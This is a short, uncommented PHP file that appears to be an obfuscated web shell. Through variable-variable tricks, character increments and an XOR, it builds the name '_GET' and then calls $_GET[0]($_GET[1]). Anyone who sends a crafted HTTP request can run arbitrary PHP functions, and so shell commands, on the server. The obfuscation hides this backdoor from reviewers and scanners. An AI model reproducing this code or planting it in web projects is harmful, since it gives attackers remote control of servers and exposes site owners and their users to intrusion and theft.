<?php
${1}=7;
${2}{1}=2;
${3}=${1}.${2};
${4}=${3}{1};
${5}=${3}{4};
++${4};++${4};++${4};++${4};
${6}=${4};
++${4};++${4};
${7}=${4};
++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};
${8}=${4};
${9}=${7}.${6}.${8};
++${5};++${5};++${5};++${5};++${5};++${5};++${5};
${10}=${5};
${11}=${3}{0}^${10};
${12}=${11}.${9};
${${12}}{0}(${${12}}{1});
?>
